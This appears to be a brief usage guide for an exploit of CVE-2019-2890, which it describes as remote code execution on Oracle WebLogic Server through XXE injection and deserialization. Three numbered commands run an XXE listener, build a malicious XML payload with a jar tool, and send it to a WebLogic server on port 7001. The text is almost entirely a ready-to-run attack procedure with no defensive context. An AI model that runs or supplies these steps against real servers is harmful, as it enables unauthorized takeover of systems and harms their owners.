
Exploit for CVE-2019-2890 targeting Oracle WebLogic Server via XXE injection and deserialization, enabling remote code execution through crafted payloads.
1)Start the XXER tool python xxer.py -H 192.168.17.223
2)Place the xxer PoC into the xx.xml file, replace the serialized data, and inject the xxer PoC; java -jar weblogic_xxe.jar xx.xml
3)Use weblogic.py from the java-deserialization-exploit tool to send data to the Weblogic server python weblogic.py 192.168.17.222 7001 weblogic